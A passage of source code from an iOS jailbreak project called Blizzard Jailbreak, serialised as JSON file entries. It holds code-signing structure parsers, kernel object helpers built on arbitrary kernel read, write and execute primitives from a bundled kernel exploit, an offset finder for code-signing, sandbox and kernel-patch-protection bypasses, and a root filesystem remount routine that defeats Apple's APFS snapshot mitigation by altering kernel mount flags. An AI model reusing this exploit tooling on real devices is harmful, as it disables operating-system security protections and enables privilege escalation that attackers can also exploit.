dst[CS_CDHASH_LEN]) {\n int ret = 1;\n const CS_SuperBlob *sb = (const CS_SuperBlob *)code_dir;\n uint8_t highest_cd_hash_rank = 0;\n for (int n = 0; n < ntohl(sb->count); n++){\n const CS_BlobIndex *blobIndex = &sb->index[n];\n uint32_t type = ntohl(blobIndex->type);\n uint32_t offset = ntohl(blobIndex->offset);\n if (ntohl(sb->length) < offset) {\n printf(\"AMFI TOOLS: offset of blob #%d overflows superblob length\\n\", n);\n return 1;\n }\n const CodeDirectory *subBlob = (const CodeDirectory *)(code_dir + offset);\n if (type == CSSLOT_CODEDIRECTORY || (type >= CSSLOT_ALTERNATE_CODEDIRECTORIES && type < CSSLOT_ALTERNATE_CODEDIRECTORY_LIMIT)) {\n uint8_t rank = hash_rank(subBlob);\n if (rank > highest_cd_hash_rank) {\n ret = get_hash(subBlob, dst);\n highest_cd_hash_rank = rank;\n }\n }\n }\n return ret;\n}\n" }, { "path": "AMFI Utilities/cs_blob.h", "content": "//from: xnu osfmk/kern/cs_blobs.h\n\n#import \n\ntypedef struct __attribute__((packed)) {\n uint32_t magic; /* magic number (CSMAGIC_CODEDIRECTORY) */\n uint32_t length; /* total length of CodeDirectory blob */\n uint32_t version; /* compatibility version */\n uint32_t flags; /* setup and mode flags */\n uint32_t hashOffset; /* offset of hash slot element at index zero */\n uint32_t identOffset; /* offset of identifier string */\n uint32_t nSpecialSlots; /* number of special hash slots */\n uint32_t nCodeSlots; /* number of ordinary (code) hash slots */\n uint32_t codeLimit; /* limit to main image signature range */\n uint8_t hashSize; /* size of each hash in bytes */\n uint8_t hashType; /* type of hash (cdHashType* constants) */\n uint8_t platform; /* platform identifier; zero if not platform binary */\n uint8_t pageSize; /* log2(page size in bytes); 0 => infinite */\n uint32_t spare2; /* unused (must be zero) */\n \n char end_earliest[0];\n \n /* Version 0x20100 */\n uint32_t scatterOffset; /* offset of optional scatter vector */\n char end_withScatter[0];\n \n /* Version 0x20200 */\n uint32_t teamOffset; /* offset of optional team identifier */\n char end_withTeam[0];\n \n /* Version 0x20300 */\n uint32_t spare3; /* unused (must be zero) */\n uint64_t codeLimit64; /* limit to main image signature range, 64 bits */\n char end_withCodeLimit64[0];\n \n /* Version 0x20400 */\n uint64_t execSegBase; /* offset of executable segment */\n uint64_t execSegLimit; /* limit of executable segment */\n uint64_t execSegFlags; /* executable segment flags */\n char end_withExecSeg[0];\n} CodeDirectory;\n\ntypedef struct __attribute__((packed)) {\n uint32_t type; /* type of entry */\n uint32_t offset; /* offset of entry */\n} CS_BlobIndex;\n\ntypedef struct __attribute__((packed)) {\n uint32_t magic; /* magic number */\n uint32_t length; /* total length of SuperBlob */\n uint32_t count; /* number of index entries following */\n CS_BlobIndex index[]; /* (count) entries */\n /* followed by Blobs in no particular order as indicated by offsets in index */\n} CS_SuperBlob;\n\ntypedef struct __SC_Scatter {\n uint32_t count; // number of pages; zero for sentinel (only)\n uint32_t base; // first page number\n uint64_t targetOffset; // offset in target\n uint64_t spare; // reserved\n} SC_Scatter;\n\n/*\n * Magic numbers used by Code Signing\n */\nenum {\n CSMAGIC_REQUIREMENT = 0xfade0c00, /* single Requirement blob */\n CSMAGIC_REQUIREMENTS = 0xfade0c01, /* Requirements vector (internal requirements) */\n CSMAGIC_CODEDIRECTORY = 0xfade0c02, /* CodeDirectory blob */\n CSMAGIC_EMBEDDED_SIGNATURE = 0xfade0cc0, /* embedded form of signature data */\n CSMAGIC_EMBEDDED_SIGNATURE_OLD = 0xfade0b02, /* XXX */\n CSMAGIC_EMBEDDED_ENTITLEMENTS = 0xfade7171, /* embedded entitlements */\n CSMAGIC_DETACHED_SIGNATURE = 0xfade0cc1, /* multi-arch collection of embedded signatures */\n CSMAGIC_BLOBWRAPPER = 0xfade0b01, /* CMS Signature, among other things */\n \n CS_SUPPORTSSCATTER = 0x20100,\n CS_SUPPORTSTEAMID = 0x20200,\n CS_SUPPORTSCODELIMIT64 = 0x20300,\n CS_SUPPORTSEXECSEG = 0x20400,\n \n CSSLOT_CODEDIRECTORY = 0, /* slot index for CodeDirectory */\n CSSLOT_INFOSLOT = 1,\n CSSLOT_REQUIREMENTS = 2,\n CSSLOT_RESOURCEDIR = 3,\n CSSLOT_APPLICATION = 4,\n CSSLOT_ENTITLEMENTS = 5,\n \n CSSLOT_ALTERNATE_CODEDIRECTORIES = 0x1000, /* first alternate CodeDirectory, if any */\n CSSLOT_ALTERNATE_CODEDIRECTORY_MAX = 5, /* max number of alternate CD slots */\n CSSLOT_ALTERNATE_CODEDIRECTORY_LIMIT = CSSLOT_ALTERNATE_CODEDIRECTORIES + CSSLOT_ALTERNATE_CODEDIRECTORY_MAX, /* one past the last */\n \n CSSLOT_SIGNATURESLOT = 0x10000, /* CMS Signature */\n \n CSTYPE_INDEX_REQUIREMENTS = 0x00000002, /* compat with amfi */\n CSTYPE_INDEX_ENTITLEMENTS = 0x00000005, /* compat with amfi */\n \n CS_HASHTYPE_SHA1 = 1,\n CS_HASHTYPE_SHA256 = 2,\n CS_HASHTYPE_SHA256_TRUNCATED = 3,\n CS_HASHTYPE_SHA384 = 4,\n \n CS_SHA1_LEN = 20,\n CS_SHA256_LEN = 32,\n CS_SHA256_TRUNCATED_LEN = 20,\n \n CS_CDHASH_LEN = 20, /* always - larger hashes are truncated */\n CS_HASH_MAX_SIZE = 48, /* max size of the hash we'll support */\n \n /*\n * Currently only to support Legacy VPN plugins,\n * but intended to replace all the various platform code, dev code etc. bits.\n */\n CS_SIGNER_TYPE_UNKNOWN = 0,\n CS_SIGNER_TYPE_LEGACYVPN = 5,\n};\n\n/*\n * Choose among different hash algorithms.\n * Higher is better, 0 => don't use at all.\n */\nstatic const uint32_t hashPriorities[] = {\n CS_HASHTYPE_SHA1,\n CS_HASHTYPE_SHA256_TRUNCATED,\n CS_HASHTYPE_SHA256,\n CS_HASHTYPE_SHA384,\n};\n\ntypedef struct __SC_GenericBlob {\n uint32_t magic; /* magic number */\n uint32_t length; /* total length of blob */\n char data[];\n} CS_GenericBlob;\n\n/*\n * C form of a CodeDirectory.\n */\ntypedef struct __CodeDirectory {\n uint32_t magic; /* magic number (CSMAGIC_CODEDIRECTORY) */\n uint32_t length; /* total length of CodeDirectory blob */\n uint32_t version; /* compatibility version */\n uint32_t flags; /* setup and mode flags */\n uint32_t hashOffset; /* offset of hash slot element at index zero */\n uint32_t identOffset; /* offset of identifier string */\n uint32_t nSpecialSlots; /* number of special hash slots */\n uint32_t nCodeSlots; /* number of ordinary (code) hash slots */\n uint32_t codeLimit; /* limit to main image signature range */\n uint8_t hashSize; /* size of each hash in bytes */\n uint8_t hashType; /* type of hash (cdHashType* constants) */\n uint8_t platform; /* platform identifier; zero if not platform binary */\n uint8_t pageSize; /* log2(page size in bytes); 0 => infinite */\n uint32_t spare2; /* unused (must be zero) */\n \n char end_earliest[0];\n \n /* Version 0x20100 */\n uint32_t scatterOffset; /* offset of optional scatter vector */\n char end_withScatter[0];\n \n /* Version 0x20200 */\n uint32_t teamOffset; /* offset of optional team identifier */\n char end_withTeam[0];\n \n /* Version 0x20300 */\n uint32_t spare3; /* unused (must be zero) */\n uint64_t codeLimit64; /* limit to main image signature range, 64 bits */\n char end_withCodeLimit64[0];\n \n /* Version 0x20400 */\n uint64_t execSegBase; /* offset of executable segment */\n uint64_t execSegLimit; /* limit of executable segment */\n uint64_t execSegFlags; /* executable segment flags */\n char end_withExecSeg[0];\n \n /* followed by dynamic content as located by offset fields above */\n} CS_CodeDirectory\n__attribute__ ((aligned(1)));\n\n\n#define CS_OPS_ENTITLEMENTS_BLOB 7 /* get entitlements blob */\nint csops(pid_t pid, unsigned int ops, void *useraddr, size_t usersize);\n\nstruct cs_blob {\n struct cs_blob *csb_next;\n cpu_type_t csb_cpu_type;\n unsigned int csb_flags;\n off_t csb_base_offset; /* Offset of Mach-O binary in fat binary */\n off_t csb_start_offset; /* Blob coverage area start, from csb_base_offset */\n off_t csb_end_offset; /* Blob coverage area end, from csb_base_offset */\n vm_size_t csb_mem_size;\n vm_offset_t csb_mem_offset;\n vm_address_t csb_mem_kaddr;\n unsigned char csb_cdhash[CS_CDHASH_LEN];\n const struct cs_hash *csb_hashtype;\n vm_size_t csb_hash_pagesize; /* each hash entry represent this many bytes in the file */\n vm_size_t csb_hash_pagemask;\n vm_size_t csb_hash_pageshift;\n vm_size_t csb_hash_firstlevel_pagesize; /* First hash this many bytes, then hash the hashes together */\n const CS_CodeDirectory *csb_cd;\n const char *csb_teamid;\n const CS_GenericBlob *csb_entitlements_blob; /* raw blob, subrange of csb_mem_kaddr */\n void * csb_entitlements; /* The entitlements as an OSDictionary */\n unsigned int csb_signer_type;\n \n unsigned int csb_reconstituted; // iOS 12 only\n \n /* The following two will be replaced by the csb_signer_type. */\n unsigned int csb_platform_binary:1;\n unsigned int csb_platform_path:1;\n \n#if __arm64e__\n uint64_t csb_pmap_cs_entry;\n#endif\n \n};\n\ntypedef void (*cs_md_init)(void *ctx);\ntypedef void (*cs_md_update)(void *ctx, const void *data, size_t size);\ntypedef void (*cs_md_final)(void *hash, void *ctx);\n\nstruct cs_hash {\n uint8_t cs_type; /* type code as per code signing */\n size_t cs_size; /* size of effective hash (may be truncated) */\n size_t cs_digest_size; /* size of native hash */\n cs_md_init cs_init;\n cs_md_update cs_update;\n cs_md_final cs_final;\n};\n" }, { "path": "AMFI Utilities/osobject.c", "content": "#import \n#import \"../Kernel Utilities/kexecute.h\"\n#import \"../Kernel Utilities/kernel_utils.h\"\n#import \"../PatchFinder/patchfinder64.h\"\n#include \"../Exploits/sock_port/kernel_memory.h\"\n#import \"osobject.h\"\n\nstatic uint32_t off_OSDictionary_SetObjectWithCharP = sizeof(void*) * 0x1F;\nstatic uint32_t off_OSDictionary_GetObjectWithCharP = sizeof(void*) * 0x26;\nstatic uint32_t off_OSDictionary_Merge = sizeof(void*) * 0x23;\nstatic uint32_t off_OSArray_Merge = sizeof(void*) * 0x1E;\nstatic uint32_t off_OSArray_RemoveObject = sizeof(void*) * 0x20;\nstatic uint32_t off_OSArray_GetObject = sizeof(void*) * 0x22;\nstatic uint32_t off_OSObject_Release = sizeof(void*) * 0x05;\nstatic uint32_t off_OSObject_GetRetainCount = sizeof(void*) * 0x03;\nstatic uint32_t off_OSObject_Retain = sizeof(void*) * 0x04;\nstatic uint32_t off_OSString_GetLength = sizeof(void*) * 0x11;\n\nint OSDictionary_SetItem(uint64_t dict, const char *key, uint64_t val) {\n size_t len = strlen(key) + 1;\n uint64_t ks = kalloc(len);\n kwrite(ks, key, len);\n uint64_t vtab = rk64(dict);\n uint64_t f = rk64(vtab + off_OSDictionary_SetObjectWithCharP);\n int rv = (int) kexecute(f, dict, ks, val, 0, 0, 0, 0);\n kfree(ks, len);\n return rv;\n}\n\nuint64_t _OSDictionary_GetItem(uint64_t dict, const char *key) {\n size_t len = strlen(key) + 1;\n uint64_t ks = kalloc(len);\n kwrite(ks, key, len);\n uint64_t vtab = rk64(dict);\n uint64_t f = rk64(vtab + off_OSDictionary_GetObjectWithCharP);\n int rv = (int) kexecute(f, dict, ks, 0, 0, 0, 0, 0);\n kfree(ks, len);\n return rv;\n}\n\nuint64_t OSDictionary_GetItem(uint64_t dict, const char *key) {\n uint64_t ret = _OSDictionary_GetItem(dict, key);\n if (ret != 0) {\n ret = ZmFixAddr(ret);\n }\n return ret;\n}\n\nint OSDictionary_Merge(uint64_t dict, uint64_t aDict) {\n uint64_t vtab = rk64(dict);\n uint64_t f = rk64(vtab + off_OSDictionary_Merge);\n return (int) kexecute(f, dict, aDict, 0, 0, 0, 0, 0);\n}\n\nint OSArray_Merge(uint64_t array, uint64_t aArray) {\n uint64_t vtab = rk64(array);\n uint64_t f = rk64(vtab + off_OSArray_Merge);\n return (int) kexecute(f, array, aArray, 0, 0, 0, 0, 0);\n}\n\nuint64_t _OSArray_GetObject(uint64_t array, unsigned int idx){\n uint64_t vtab = rk64(array);\n uint64_t f = rk64(vtab + off_OSArray_GetObject);\n return kexecute(f, array, idx, 0, 0, 0, 0, 0);\n}\n\nuint64_t OSArray_GetObject(uint64_t array, unsigned int idx){\n uint64_t ret = _OSArray_GetObject(array, idx);\n if (ret != 0){\n ret = ZmFixAddr(ret);\n }\n return ret;\n}\n\nvoid OSArray_RemoveObject(uint64_t array, unsigned int idx){\n uint64_t vtab = rk64(array);\n uint64_t f = rk64(vtab + off_OSArray_RemoveObject);\n (void)kexecute(f, array, idx, 0, 0, 0, 0, 0);\n}\nuint64_t _OSUnserializeXML(const char* buffer) {\n size_t len = strlen(buffer) + 1;\n uint64_t ks = kalloc(len);\n kwrite(ks, buffer, len);\n uint64_t errorptr = 0;\n uint64_t rv = kexecute(Find_osunserializexml(), ks, errorptr, 0, 0, 0, 0, 0);\n kfree(ks, len);\n return rv;\n}\n\nuint64_t OSUnserializeXML(const char* buffer) {\n uint64_t ret = _OSUnserializeXML(buffer);\n if (ret != 0) {\n ret = ZmFixAddr(ret);\n }\n return ret;\n}\n\nvoid OSObject_Release(uint64_t osobject) {\n uint64_t vtab = rk64(osobject);\n uint64_t f = rk64(vtab + off_OSObject_Release);\n (void) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);\n}\n\nvoid OSObject_Retain(uint64_t osobject) {\n uint64_t vtab = rk64(osobject);\n uint64_t f = rk64(vtab + off_OSObject_Retain);\n (void) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);\n}\n\nuint32_t OSObject_GetRetainCount(uint64_t osobject) {\n uint64_t vtab = rk64(osobject);\n uint64_t f = rk64(vtab + off_OSObject_GetRetainCount);\n return (uint32_t) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);\n}\n\nunsigned int OSString_GetLength(uint64_t osstring){\n uint64_t vtab = rk64(osstring);\n uint64_t f = rk64(vtab + off_OSString_GetLength);\n return (unsigned int)kexecute(f, osstring, 0, 0, 0, 0, 0, 0);\n}\n\nchar *OSString_CopyString(uint64_t osstring){\n unsigned int length = OSString_GetLength(osstring);\n char *str = malloc(length + 1);\n str[length] = 0;\n kread(OSString_CStringPtr(osstring), str, length);\n return str;\n}\n" }, { "path": "AMFI Utilities/osobject.h", "content": "#include \"../Exploits/sock_port/kernel_memory.h\"\n\n#define OSDictionary_ItemCount(dict) rk32(dict+20)\n#define OSDictionary_ItemBuffer(dict) rk64(dict+32)\n#define OSDictionary_ItemKey(buffer, idx) rk64(buffer+16*idx)\n#define OSDictionary_ItemValue(buffer, idx) rk64(buffer+16*idx+8)\n#define OSString_CStringPtr(str) rk64(str + 0x10)\n#define OSArray_ItemCount(arr) rk32(arr+0x14)\n#define OSArray_ItemBuffer(arr) rk64(arr+32)\n\n// see osobject.c for info\n\nint OSDictionary_SetItem(uint64_t dict, const char *key, uint64_t val);\nuint64_t OSDictionary_GetItem(uint64_t dict, const char *key);\nint OSDictionary_Merge(uint64_t dict, uint64_t aDict);\nvoid OSArray_RemoveObject(uint64_t array, unsigned int idx);\nuint64_t OSArray_GetObject(uint64_t array, unsigned int idx);\nint OSArray_Merge(uint64_t array, uint64_t aArray);\nuint64_t OSUnserializeXML(const char* buffer);\n\nvoid OSObject_Release(uint64_t osobject);\nvoid OSObject_Retain(uint64_t osobject);\nuint32_t OSObject_GetRetainCount(uint64_t osobject);\n\nunsigned int OSString_GetLength(uint64_t osstring);\nchar *OSString_CopyString(uint64_t osstring);\n" }, { "path": "APFS Utilities/IOKit.h", "content": "//\n// IOKit.h\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 08/10/2020.\n// Copyright © 2020 Blizzard Jailbreak. All rights reserved.\n//\n\n#ifndef IOKit_h\n#define IOKit_h\n#define IO_OBJECT_NULL (0)\n#include \n\ntypedef mach_port_t io_service_t;\ntypedef mach_port_t io_connect_t;\ntypedef mach_port_t io_object_t;\ntypedef io_object_t io_registry_entry_t;\ntypedef char io_name_t[128];\ntypedef char io_struct_inband_t[4096];\nextern const mach_port_t kIOMasterPortDefault;\n\nkern_return_t mach_vm_read(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, vm_offset_t *data, mach_msg_type_number_t *dataCnt);\nio_service_t IOServiceGetMatchingService(mach_port_t _masterPort, CFDictionaryRef matching);\nCFMutableDictionaryRef IOServiceMatching(const char* name);\nkern_return_t IOServiceOpen(io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t* connect);\nio_service_t IOServiceGetMatchingService(mach_port_t _masterPort, CFDictionaryRef matching);\nCFMutableDictionaryRef IOServiceMatching(const char* name);\n\nkern_return_t IORegistryEntrySetCFProperties(io_registry_entry_t entry, CFTypeRef properties);\nkern_return_t IORegistryEntryGetProperty(io_registry_entry_t entry, const io_name_t propertyName, io_struct_inband_t buffer, uint32_t * size);\nio_registry_entry_t IORegistryEntryFromPath(mach_port_t port, char *path);\nkern_return_t IOObjectRelease(io_object_t object);\nkern_return_t IOConnectTrap6(io_connect_t connect, uint32_t index, uintptr_t p1, uintptr_t p2, uintptr_t p3, uintptr_t p4, uintptr_t p5, uintptr_t p6);\nkern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);\nkern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);\nkern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);\nkern_return_t mach_vm_deallocate(vm_map_t target, mach_vm_address_t address, mach_vm_size_t size);\nkern_return_t mach_vm_remap(vm_map_t dst, mach_vm_address_t *dst_addr, mach_vm_size_t size, mach_vm_offset_t mask, int flags, vm_map_t src, mach_vm_address_t src_addr, boolean_t copy, vm_prot_t *cur_prot, vm_prot_t *max_prot, vm_inherit_t inherit);\n\n#endif\n/* IOKit_h */\n" }, { "path": "APFS Utilities/liboffsetfinder64.hpp", "content": "//\n// offsetfinder64.hpp\n// offsetfinder64\n//\n// Created by tihmstar on 10.01.18.\n// Copyright © 2018 tihmstar. All rights reserved.\n// This is from here: https://github.com/tihmstar/liboffsetfinder64\n//\n\n#ifndef offsetfinder64_hpp\n#define offsetfinder64_hpp\n\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\ntypedef uint64_t offset_t;\nnamespace tihmstar {\n class exception : public std::exception{\n std::string _err;\n int _code;\n public:\n exception(int code, std::string err) : _err(err), _code(code) {};\n exception(std::string err) : _err(err), _code(0) {};\n exception(int code) : _code(code) {};\n const char *what(){return _err.c_str();}\n int code(){return _code;}\n };\n namespace patchfinder64{\n typedef uint8_t* loc_t;\n \n class patch{\n bool _slideme;\n void(*_slidefunc)(class patch *patch, uint64_t slide);\n public:\n const loc_t _location;\n const void *_patch;\n const size_t _patchSize;\n patch(loc_t location, const void *patch, size_t patchSize, void(*slidefunc)(class patch *patch, uint64_t slide) = NULL) : _location(location), _patchSize(patchSize), _slidefunc(slidefunc){\n _patch = malloc(_patchSize);\n memcpy((void*)_patch, patch, _patchSize);\n _slideme = (_slidefunc) ? true : false;\n }\n patch(const patch& cpy) : _location(cpy._location), _patchSize(cpy._patchSize){\n _patch = malloc(_patchSize);\n memcpy((void*)_patch, cpy._patch, _patchSize);\n _slidefunc = cpy._slidefunc;\n _slideme = cpy._slideme;\n }\n void slide(uint64_t slide){\n if (!_slideme)\n return;\n printf(\"sliding with %p\\n\",(void*)slide);\n _slidefunc(this,slide);\n _slideme = false; //only slide once\n }\n ~patch(){\n free((void*)_patch);\n }\n \n };\n }\n class offsetfinder64 {\n public:\n struct text_t{\n patchfinder64::loc_t map;\n size_t size;\n patchfinder64::loc_t base;\n bool isExec;\n };\n \n private:\n bool _freeKernel;\n uint8_t *_kdata;\n size_t _ksize;\n offset_t _kslide;\n patchfinder64::loc_t _kernel_entry;\n std::vector _segments;\n \n struct symtab_command *__symtab;\n void loadSegments(uint64_t slide);\n __attribute__((always_inline)) struct symtab_command *getSymtab();\n \n public:\n offsetfinder64(const char *filename);\n offsetfinder64(void* buf, size_t size, uint64_t base);\n const void *kdata();\n patchfinder64::loc_t find_entry();\n const std::vector &segments(){return _segments;};\n \n patchfinder64::loc_t memmem(const void *little, size_t little_len);\n \n patchfinder64::loc_t find_sym(const char *sym);\n patchfinder64::loc_t find_syscall0();\n uint64_t find_register_value(patchfinder64::loc_t where, int reg, patchfinder64::loc_t startAddr = 0);\n \n /*------------------------ v0rtex -------------------------- */\n patchfinder64::loc_t find_zone_map();\n patchfinder64::loc_t find_kernel_map();\n patchfinder64::loc_t find_kernel_task();\n patchfinder64::loc_t find_realhost();\n patchfinder64::loc_t find_bzero();\n patchfinder64::loc_t find_bcopy();\n patchfinder64::loc_t find_copyout();\n patchfinder64::loc_t find_copyin();\n patchfinder64::loc_t find_ipc_port_alloc_special();\n patchfinder64::loc_t find_ipc_kobject_set();\n patchfinder64::loc_t find_ipc_port_make_send();\n patchfinder64::loc_t find_chgproccnt();\n patchfinder64::loc_t find_kauth_cred_ref();\n patchfinder64::loc_t find_osserializer_serialize();\n uint32_t find_vtab_get_external_trap_for_index();\n uint32_t find_vtab_get_retain_count();\n uint32_t find_iouserclient_ipc();\n uint32_t find_ipc_space_is_task();\n uint32_t find_proc_ucred();\n uint32_t find_task_bsd_info();\n uint32_t find_vm_map_hdr();\n uint32_t find_task_itk_self();\n uint32_t find_task_itk_registered();\n uint32_t find_sizeof_task();\n \n patchfinder64::loc_t find_rop_add_x0_x0_0x10();\n patchfinder64::loc_t find_rop_ldr_x0_x0_0x10();\n \n \n /*------------------------ kernelpatches -------------------------- */\n patchfinder64::patch find_i_can_has_debugger_patch_off();\n patchfinder64::patch find_lwvm_patch_offsets();\n patchfinder64::patch find_remount_patch_offset();\n std::vector find_nosuid_off();\n patchfinder64::patch find_proc_enforce();\n patchfinder64::patch find_amfi_patch_offsets();\n patchfinder64::patch find_cs_enforcement_disable_amfi();\n patchfinder64::patch find_amfi_substrate_patch();\n // patchfinder64::patch find_sandbox_patch();\n patchfinder64::loc_t find_sbops();\n patchfinder64::patch find_nonceEnabler_patch();\n \n \n /*------------------------ KPP bypass -------------------------- */\n patchfinder64::loc_t find_gPhysBase();\n patchfinder64::loc_t find_kernel_pmap();\n patchfinder64::loc_t find_cpacr_write();\n patchfinder64::loc_t find_idlesleep_str_loc();\n patchfinder64::loc_t find_deepsleep_str_loc();\n \n /*------------------------ Util -------------------------- */\n patchfinder64::loc_t find_rootvnode();\n \n ~offsetfinder64();\n };\n using segment_t = std::vector;\n namespace patchfinder64{\n \n loc_t find_literal_ref(segment_t segemts, offset_t kslide, loc_t pos);\n }\n}\n\n\n\n#endif /* offsetfinder64_hpp */\n" }, { "path": "APFS Utilities/offsetfinder.cpp", "content": "// Based on tihmstar's liboffsetfinder64 which is open source here:\n// https://github.com/tihmstar/liboffsetfinder64\n// Also Coolstar's implementation from Electra.\n\n#include \n#include \n#include \"rootfs_remount.h\"\n#include \"liboffsetfinder64.hpp\"\n\nusing namespace std;\nusing namespace tihmstar;\n\nextern \"C\" uint64_t offset_vfs_context_current;\nextern \"C\" uint64_t offset_vnode_lookup;\nextern \"C\" uint64_t offset_vnode_put;\n\nextern \"C\" bool offsetizeRN(uint64_t slide){\n printf(\"Initializing OffsetFinder...\\n\");\n offsetfinder64 fi(\"/System/Library/Caches/com.apple.kernelcaches/kernelcache\");\n \n try {\n offset_vfs_context_current = (uint64_t)fi.find_sym(\"_vfs_context_current\");\n offset_vnode_lookup = (uint64_t)fi.find_sym(\"_vnode_lookup\");\n offset_vnode_put = (uint64_t)fi.find_sym(\"_vnode_put\");\n \n printf(\" Offsetfinder: GOT: vfs_context_current: %p\\n\", (void *)offset_vfs_context_current);\n printf(\" Offsetfinder: GOT: vnode_lookup: %p\\n\", (void *)offset_vnode_lookup);\n printf(\" Offsetfinder: GOT: vnode_put: %p\\n\", (void *)offset_vnode_put);\n \n offset_vfs_context_current += slide;\n offset_vnode_lookup += slide;\n offset_vnode_put += slide;\n printf(\"OffsetFinder: The OffsetFinder ran successfully! Continuing...\\n\");\n return true;\n } catch (tihmstar::exception &e){\n printf(\"OffsetFinder: The OffsetFinder has failed! Aborting... %d (%s)\\n\", e.code(), e.what());\n return false;\n } catch (std::exception &e){\n printf(\"OffsetFinder: Could not properly initialize the OffsetFinder! %s\\n\", e.what());\n return false;\n }\n}\n" }, { "path": "APFS Utilities/rootfs_remount.h", "content": "//\n// rootfs_remount.h\n// electra1131\n//\n// Created by CoolStar on 6/7/18.\n// Copyright © 2018 CoolStar. All rights reserved.\n//\n\n#ifndef rootfs_remount_h\n#define rootfs_remount_h\n#include \n#include \n#include \n#include \n#include \n\nint file_exists(const char *filename);\n#define cp(to, from) copyfile(from, to, 0, COPYFILE_ALL)\n#ifdef __cplusplus\nextern \"C\" {\n#endif\nextern int shouldReboot;\nint remountRootFS(void);\nint unjailbreakBlizzard(void);\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* rootfs_remount_h */\n" }, { "path": "APFS Utilities/rootfs_remount.m", "content": "// Thanks to the Electra Team and Pwn20wnd!\n/* APFS snapshot mitigation bypass bug by CoolStar, exploitation by Pwn20wnd */\n/* Disables the new APFS snapshot mitigations introduced in iOS 11.3 */\n\n#include \n#import \n#include \n#include \n#include \n#include \"rootfs_remount.h\"\n#include \"snapshot_tools.h\"\n#include \n#include \"../Exploits/sock_port/kernel_memory.h\"\n#include \"../Exploits/sock_port/exploit.h\"\n#include \"../Kernel Utilities/kernel_utils.h\"\n#include \"../PatchFinder/patchfinder64.h\"\n#include \"../Kernel Utilities/kexecute.h\"\n#include \"../Exploits/sock_port/offsetof.h\"\n#include \"../Kernel Utilities/system_reboot.h\"\n#include \"../Blizzard Jailbreak/BlizzardLog.h\"\n#include \"../Blizzard Jailbreak/blizzardJailbreak.h\"\n#include \"../APFS Utilities/snapshot_tools.h\"\n#define ROOTFSTESTFILE \"/.BlizzardJB\"\n#define ROOTFSMNT \"/var/rootfsmnt\"\n#define APPLESNAP \"com.apple.os.update-\"\n#include \"../Kernel Utilities/kernSymbolication.h\"\n\nuint64_t offset_vfs_context_current;\nuint64_t offset_vnode_lookup;\nuint64_t offset_vnode_put;\nchar *diskLocation = \"/dev/disk0s1s1\";\nint shouldReboot = 0;\nvoid dumpContentsOfDir(char *path);\n\n// From http://newosxbook.com/src.jl?tree=&file=/xnu-1504.15.3/bsd/hfs/hfs_mount.h\nstruct hfs_mount_args {\n char *fspec; /* block special device to mount */\n uid_t hfs_uid; /* uid that owns hfs files (standard HFS only) */\n gid_t hfs_gid; /* gid that owns hfs files (standard HFS only) */\n mode_t hfs_mask; /* mask to be applied for hfs perms (standard HFS only) */\n u_int32_t hfs_encoding; /* encoding for this volume (standard HFS only) */\n struct timezone hfs_timezone; /* user time zone info (standard HFS only) */\n int flags; /* mounting flags, see below */\n int journal_tbuffer_size; /* size in bytes of the journal transaction buffer */\n int journal_flags; /* flags to pass to journal_open/create */\n int journal_disable; /* don't use journaling (potentially dangerous) */\n};\n\nint file_exists(const char *filename) {\n int r = access(filename, F_OK);\n return (r == 0);\n}\n\nstatic uint64_t _vnode_lookup = 0;\nstatic uint64_t _vnode_put = 0;\nstatic uint64_t _vfs_context_current = 0;\n\nint vnode_lookup(const char *path, int flags, uint64_t *vnode, uint64_t vfs_context) {\n \n size_t len = strlen(path) + 1;\n uint64_t ptr = kalloc(8);\n uint64_t ptr2 = kalloc(len);\n kwrite(ptr2, path, len);\n \n _vnode_lookup = find_symbol(\"_vnode_lookup\", false);\n if (!_vnode_lookup) _vnode_lookup = Find_vnode_lookup();\n else _vnode_lookup += kernel_slide;\n \n if (kexecute(_vnode_lookup, ptr2, flags, ptr, vfs_context, 0, 0, 0)) {\n return -1;\n }\n *vnode = rk64(ptr);\n kfree(ptr2, len);\n kfree(ptr, 8);\n return 0;\n}\n\nuint64_t get_vfs_context() {\n _vfs_context_current = find_symbol(\"_vfs_context_current\", false);\n if (!_vfs_context_current) _vfs_context_current = Find_vfs_context_current();\n else _vfs_context_current += kernel_slide;\n return ZmFixAddr(kexecute(_vfs_context_current, 1, 0, 0, 0, 0, 0, 0));\n}\n\nint vnode_put(uint64_t vnode) {\n _vnode_put = find_symbol(\"_vnode_put\", false);\n if (!_vnode_put) _vnode_put = Find_vnode_put();\n else _vnode_put += kernel_slide;\n return (int)kexecute(_vnode_put, vnode, 0, 0, 0, 0, 0, 0);\n}\n\nint mountDevAtPathAsRW(const char* devpath, const char* path) {\n struct hfs_mount_args mntargs;\n bzero(&mntargs, sizeof(struct hfs_mount_args));\n mntargs.fspec = (char*)devpath;\n mntargs.hfs_mask = 1;\n gettimeofday(NULL, &mntargs.hfs_timezone);\n int rvtmp = mount(\"apfs\", path, 0, (void *)&mntargs);\n perror(\"mount\");\n return rvtmp;\n}\n\nuint64_t getVnodeAtPath(const char *path) {\n uint64_t *vnode_ptr = (uint64_t *)malloc(8);\n if (vnode_lookup(path, 0, vnode_ptr, get_vfs_context())) {\n printf(\"ROOT FS REMOUNT: Unable to get vnode from path for %s\\n\", path);\n free(vnode_ptr);\n return -1;\n }\n else {\n uint64_t vnode = *vnode_ptr;\n free(vnode_ptr);\n printf(\"GOT VNODE: 0x%llx\\n\", vnode);\n return vnode;\n }\n}\n\nBOOL remount1126() {\n uint64_t rootfs_vnode = getVnodeAtPath(\"/\");\n printf(\"\\nROOT FS REMOUNT: vnode of /: 0x%llx\\n\", rootfs_vnode);\n uint64_t v_mount = rk64(rootfs_vnode + off_v_mount);\n uint32_t v_flag = rk32(v_mount + off_mnt_flag);\n printf(\"ROOT FS REMOUNT: Clearing FS Flags\\n\");\n printf(\"ROOT FS REMOUNT: Flags before 0x%x\\n\", v_flag);\n v_flag &= ~MNT_NOSUID;\n v_flag &= 